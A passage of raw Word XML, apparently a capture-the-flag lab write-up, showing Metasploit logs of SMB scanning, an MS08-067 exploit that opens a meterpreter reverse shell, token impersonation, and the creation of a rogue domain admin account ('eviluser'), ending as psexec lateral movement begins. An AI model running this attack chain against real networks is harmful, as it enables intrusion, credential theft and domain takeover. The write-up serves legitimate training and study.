      </w:r>
    </w:p>
    <w:p w14:paraId="67F3E237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RHOSTS =&gt; 10.10.94.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123A33D8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15687E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE3B378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0368DFCF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10.10.94.20:445 is running Windows 2003 SP1 (build:3790) (name:SMB-SERVER) (domain:WIDGET-CORP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695EBA2D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Scanned 1 of 1 hosts (100% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7219301A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Auxiliary module execution completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B575AE4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15687E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; set RHOSTS 10.10.94.99</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7146C9FF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RHOSTS =&gt; 10.10.94.99</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C02E6D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15687E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC1EFED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311E3941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10.10.94.99:445 could not be identified: Unix (Samba 3.0.20-Debian)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F874A80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Scanned 1 of 1 hosts (100% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3442132D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Auxiliary module execution completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E676CB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15687E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; set RHOSTS 10.10.94.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55683498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RHOSTS =&gt; 10.10.94.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B685CF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15687E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3820D5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26503B8F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10.10.94.101:445 is running Windows 2008 R2 Standard (build:7600) (name:2K8-VICTIM-HTTP) (domain:WIDGET-CORP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F09AEEB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Scanned 1 of 1 hosts (100% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618862A2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Auxiliary module execution completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483CC508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15687E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; set RHOSTS 10.10.94.252</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5F9820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</w:rPr>
        <w:t>RHOSTS =&gt; 10.10.94.252</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145BE3C3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sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidRPr="0015687E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> auxiliary(</w:t>
      </w:r>
      <w:r w:rsidRPr="0015687E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15687E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243D650A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625A091F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10.10.94.252:445 is running Windows 2003 SP1 (build:3790) (name:HTTP-DEVEL) (domain:WIDGET-CORP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331CD7F5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Scanned 1 of 1 hosts (100% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7495A8D8" w14:textId="77777777" w:rsidR="0015687E" w:rsidRPr="0015687E" w:rsidRDefault="0015687E" w:rsidP="001568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5687E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15687E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Auxiliary module execution completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2382F7B9" w14:textId="77777777" w:rsidR="0015687E" w:rsidRDefault="0015687E"/>
    <w:p w14:paraId="5B252C74" w14:textId="77777777" w:rsidR="00392D72" w:rsidRDefault="00392D72"/>
    <w:p w14:paraId="047C8454" w14:textId="77777777" w:rsidR="00392D72" w:rsidRDefault="00392D72">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C273E46" w14:textId="0892D831" w:rsidR="00392D72" w:rsidRDefault="00392D72">
      <w:r>
        <w:t>So final network map was like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD4C6D4" w14:textId="77777777" w:rsidR="00392D72" w:rsidRDefault="00392D72" w:rsidP="00392D72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10.10.93.1(LATERALCTF-DC) - Windows 2008 R2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDCAB94" w14:textId="77777777" w:rsidR="00392D72" w:rsidRDefault="00392D72" w:rsidP="00392D72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10.10.93.15(WIDGETEER) - Windows 7 - I am guess this is the target box</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AF0A49" w14:textId="77777777" w:rsidR="00392D72" w:rsidRDefault="00392D72" w:rsidP="00392D72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5E2A4ADD" w14:textId="77777777" w:rsidR="00392D72" w:rsidRDefault="00392D72" w:rsidP="00392D72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10.10.94.1(LATERALCTF-DC) - Windows 2008 R2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1786F0E8" w14:textId="77777777" w:rsidR="00392D72" w:rsidRDefault="00392D72" w:rsidP="00392D72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10.10.94.5(VICTIM-SMTP) - Windows 2003 SP1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED4A7FC" w14:textId="77777777" w:rsidR="00392D72" w:rsidRDefault="00392D72" w:rsidP="00392D72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10.10.94.20(SMB-SERVER) - Windows 2003 SP1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3D2EC3" w14:textId="77777777" w:rsidR="00392D72" w:rsidRDefault="00392D72" w:rsidP="00392D72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10.10.94.99- Unix Samba</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5937BBDD" w14:textId="77777777" w:rsidR="00392D72" w:rsidRDefault="00392D72" w:rsidP="00392D72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10.10.94.101(2K8-VICTIM-HTTP) - Windows 2008 R2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2F02FF" w14:textId="77777777" w:rsidR="00392D72" w:rsidRDefault="00392D72" w:rsidP="00392D72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10.10.94.252(HTTP-DEVEL) - Windows 2003 SP1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488CDEFE" w14:textId="77777777" w:rsidR="00392D72" w:rsidRDefault="00392D72"/>
    <w:p w14:paraId="6F97DB9E" w14:textId="77777777" w:rsidR="0015687E" w:rsidRDefault="0015687E"/>
    <w:p w14:paraId="2C7B5451" w14:textId="5C343D6B" w:rsidR="0015687E" w:rsidRDefault="0015687E">
      <w:r>
        <w:t xml:space="preserve">Step 11.  Exploited </w:t>
      </w:r>
      <w:r w:rsidRPr="0015687E">
        <w:t>windows/smb/ms08_067_netapi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vulnerability to get into Windows 2003 SP1 servers. There I checked if any system has a user with which we can create a user which can be used in domain controller.</w:t>
      </w:r>
      <w:r w:rsidR="00392D72">
        <w:t xml:space="preserve"> I also ran hashdump in each system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696B0366" w14:textId="77777777" w:rsidR="0015687E" w:rsidRDefault="0015687E"/>
    <w:p w14:paraId="287B6C27" w14:textId="20CD178C" w:rsidR="0015687E" w:rsidRPr="00392D72" w:rsidRDefault="00392D72">
      <w:pPr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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidRPr="00392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> auxiliary(</w:t>
      </w:r>
      <w:r w:rsidRPr="00392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B42419"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>smb_version</w:t>
      </w:r>
      <w:r w:rsidRPr="00392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; use windows/smb/ms08_067_netapi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4200E022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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidRPr="00392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(</w:t>
      </w:r>
      <w:r w:rsidRPr="00392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B42419"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ms08_067_netapi</w:t>
      </w:r>
      <w:r w:rsidRPr="00392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; set RHOST 10.10.94.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A35111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RHOST =&gt; 10.10.94.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3269D56A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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidRPr="00392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(</w:t>
      </w:r>
      <w:r w:rsidRPr="00392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B42419"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ms08_067_netapi</w:t>
      </w:r>
      <w:r w:rsidRPr="00392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; set LHOST 172.17.17.116</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212D0DFD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LHOST =&gt; 172.17.17.116</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587E6B84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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidRPr="00392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(</w:t>
      </w:r>
      <w:r w:rsidRPr="00392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B42419"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ms08_067_netapi</w:t>
      </w:r>
      <w:r w:rsidRPr="00392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; set LPORT 4545</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EF812C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LPORT =&gt; 4545</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA9308F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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidRPr="00392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(</w:t>
      </w:r>
      <w:r w:rsidRPr="00392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B42419"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ms08_067_netapi</w:t>
      </w:r>
      <w:r w:rsidRPr="00392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB8A415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payload =&gt; windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7B9410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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidRPr="00392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(</w:t>
      </w:r>
      <w:r w:rsidRPr="00392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B42419"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ms08_067_netapi</w:t>
      </w:r>
      <w:r w:rsidRPr="00392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEC333C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1F763D5F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392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Started reverse handler on 172.17.17.116:4545 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161D1E4F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392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Automatically detecting the target...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76208A66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392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fingerprint: Windows 2003 - Service Pack 1 - lang:Unknown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596A52C1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392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> We could not detect the language pack, defaulting to English</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF59EF0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392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Selected Target: Windows 2003 SP1 English (NX)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDF3B73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392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attempting to trigger the vulnerability...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F87197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392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sending stage (885806 bytes) to 10.10.94.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332A53EC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b/>
          <w:bCs/>
          <w:color w:val="400BD9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>[*]</w:t>
      </w:r>
      <w:r w:rsidRPr="00392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Meterpreter session 4 opened (172.17.17.116:4545 -&gt; 10.10.94.5:1230) at 2016-03-07 19:41:36 -0500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E242B3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7825C62F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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r w:rsidRPr="00392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770D1BB1" w14:textId="5C30EE56" w:rsidR="00392D72" w:rsidRDefault="00392D72" w:rsidP="00392D72">
      <w:r w:rsidRPr="00392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Server username: NT AUTHORITY\SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125E65FE" w14:textId="77777777" w:rsidR="0015687E" w:rsidRDefault="0015687E"/>
    <w:p w14:paraId="37ED4AA8" w14:textId="315DA5D9" w:rsidR="00392D72" w:rsidRDefault="007C13DF">
      <w:r>
        <w:t xml:space="preserve">Step 12. </w:t>
      </w:r>
      <w:r w:rsidR="00392D72">
        <w:t>On 10.10.94.252 I was able to find an admin user with which I was able to create a user on domain controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E0CD3F" w14:textId="77777777" w:rsidR="00392D72" w:rsidRDefault="00392D72"/>
    <w:p w14:paraId="407F940E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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r w:rsidRPr="00392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; load incognito </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2EC500" w14:textId="795FB1AD" w:rsidR="00392D72" w:rsidRPr="00392D72" w:rsidRDefault="00392D72" w:rsidP="00392D72">
      <w:pPr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Loading extension incognito...success.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77120598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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r w:rsidRPr="00392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; list_tokens -u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096D9547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4C047E6A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Delegation Tokens Available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63727622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========================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392AD716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NT AUTHORITY\LOCAL SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8A2D93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NT AUTHORITY\NETWORK SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F033E4A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NT AUTHORITY\SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A796735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WIDGET-CORP\Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7963A7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31F0B9D6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Impersonation Tokens Available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B161B1C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========================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1AEF3F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NT AUTHORITY\ANONYMOUS LOGON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1658F0EC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6D1F4794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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r w:rsidRPr="00392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; impersonate_token WIDGET-CORP\\Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6409DB4B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[+] Delegation token available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692EC70D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[+] Successfully impersonated user WIDGET-CORP\Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429732C3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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r w:rsidRPr="00392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D83320A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Process 3556 created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D23833F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Channel 2 created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066EEB05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Microsoft Windows [Version 5.2.3790]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683ADE47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(C) Copyright 1985-2003 Microsoft Corp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356E443A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623C3744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C:\WINDOWS\system32&gt;net user eviluser EvilPass1 /add /domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B210F82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net user eviluser EvilPass1 /add /domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5CC5F7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The request will be processed at a domain controller for domain widget-corp.tiwaz.net.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48238978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14:paraId="165D9A70" w14:textId="77777777" w:rsidR="00392D72" w:rsidRPr="00392D72" w:rsidRDefault="00392D72" w:rsidP="00392D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392D72">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>The command completed successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578DE581" w14:textId="77777777" w:rsidR="00282CCC" w:rsidRDefault="00282CCC"/>
    <w:p w14:paraId="104E706D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7C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>C:\WINDOWS\system32&gt;net group "Domain Admins" eviluser /add /domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3BACDD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7C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>net group "Domain Admins" eviluser /add /domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086354A8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7C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>The request will be processed at a domain controller for domain widget-corp.tiwaz.net.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B3779D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</w:p>
    <w:p w14:paraId="31009FEC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7C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>The command completed successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AA652B" w14:textId="77777777" w:rsidR="00282CCC" w:rsidRDefault="00282CCC"/>
    <w:p w14:paraId="0003EB11" w14:textId="77777777" w:rsidR="007C13DF" w:rsidRDefault="007C13DF"/>
    <w:p w14:paraId="7AA13A48" w14:textId="5F098A39" w:rsidR="00392D72" w:rsidRDefault="007C13DF">
      <w:r>
        <w:t xml:space="preserve">Step 13. </w:t>
      </w:r>
      <w:r w:rsidR="00392D72">
        <w:t>Run psexec to get into domain controllers, widgeteer and other systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066FAF73" w14:textId="77777777" w:rsidR="00392D72" w:rsidRDefault="00392D72"/>
    <w:p w14:paraId="0C0892FD" w14:textId="3FFBA510" w:rsidR="007C13DF" w:rsidRPr="007C13DF" w:rsidRDefault="007C13DF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidRPr="007C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(</w:t>
      </w:r>
      <w:r w:rsidRPr="007C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B42419"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>handler</w:t>
      </w:r>
      <w:r w:rsidRPr="007C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>) &gt; use exploit/windows/smb/psexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46451547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7C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidRPr="007C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(</w:t>
      </w:r>
      <w:r w:rsidRPr="007C13DF">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B42419"/>
